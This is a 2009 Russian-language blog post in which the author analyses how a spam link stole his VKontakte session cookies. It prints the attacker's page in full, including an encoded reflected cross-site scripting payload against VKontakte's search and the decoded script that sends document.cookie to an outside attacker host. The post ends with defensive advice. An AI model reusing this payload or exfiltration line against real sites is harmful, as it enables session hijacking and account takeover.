среда, 17 июня 2009 г.

Кража моих вконтактных печенек

Печенька - это cookies



До вчерашнего времени я себя чувствовал очень уверенным в плане безопасности моих личных данных в контакте. Никогда и нигде не оставлял логин/пароль, и сидя в основном под линуксом, не думал о возможности подхватить какой то троян/вирус.

Вчера как обычно ко мне пришол спам, и как обычно решил посмотреть на это исполнение выманивания логина/пароля. Но к моему удивлению была только страничка с какой то тупой социалкой-знакомств.

Придя утром на работу увидел куча сообщений о том что от меня приходит СПАМ. Меня это реально зацепило! =)



Удалив 5 страниц разосланного спама из "Отправленных" сообщений, принялся за анализ того как это произошло.

1. Смотрим куда нас направили.

.:: isia@isia-laptop (11:39) 0 ::. ~
=>curl http://vkrovatke.tk/

<html>
<head>
<title>vkrovatke.tk</title>
<meta name="description" content="vkrovatke.tk">
<meta name="keywords" content="ñîâåðøåííîëåòíèì,ïðåäíàçíà÷åíà,êîíòàêòå,ïåðåõîä,âíåøíåé,ññûëêå">
</head>

<frameset rows="*" framespacing="0" border="0" frameborder="NO">
<frame src="http://cveto4kii.narod.ru/" name="dot_tk_frame_content" scrolling="auto" noresize>
</frameset>
<noframes>
<body>
</body>
</noframes>
</html>


2. Посмотрим куда ведет ифрейм

.:: isia@isia-laptop (11:39) 0 ::. ~
=>curl http://cveto4kii.narod.ru/

<html>
<head>
<title>� �������� | ������� �� ������� ������</title>
</head>
<body style="padding:20px 180px; font-size:12px; font-family:Tahoma; line-height:200%">

<iframe src='http://%76%6b%6f%6e%74%61%6b%74%65%2e%72%75/gsearch.php?q=%27;()())//\%27;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,101,98,122,101,114,46,118,111,118,46,114,117,47,115,46,112,104,112,63,100,99,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,39,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,62,60,47,105,102,114,97,109,101,62,39,41,59,60,47,115,99,114,105,112,116,62))//%22;%3C%3E%22)//\%22;%3C%3E%22%3C%3E%22%22!---%22?%3E#c[q]=%27%3B()())%20%20\&c[section]=people' style='display:none;'></iframe>
<center><h2><h2>

........
</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<div style="background:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=narod_total/)"></div>
<script language="JavaScript" src="http://yabs.yandex.ru/show/163"></script>
<!-- mailto:spm111@yandex.ru -->


3. Тут уже видим интереснейший фрем, который ведет нас в вКонтакт на страницу поиска. В запрос вживляются экранированный яваскрипт, после выполнения которого в документ дописывается следующий код:<script>document.write('<iframe src="http://webzer.vov.ru/s.php?dc='+document.cookie+'" style="display:none;"></iframe>');</script>

Этот фрейм пересылает все печеньки с контакта на левый сайт атакующего. У кого печеньки, у того сила!

ВЫВОДЫ: На данный момент дыра в поиске у контакта уже закрыта,  и данная инъекция уже не работает. Но это не последняя дыра... Как себя защитить от такой фигни? Ведь такой код можно вставить не только на нацеленную страничку со спамом, но и на любом форуме или любом другом сайте. Тем самым простая навигация по сети может стать угрозой безопасности. Можно выходить каждый раз из вконтакта когда заканчиваете с ним работу, или установить еще один браузер в котором сидеть !только! в контакте и других сайтах где опасаетесь за свои личные данные.

Удачи!

7 комментариев: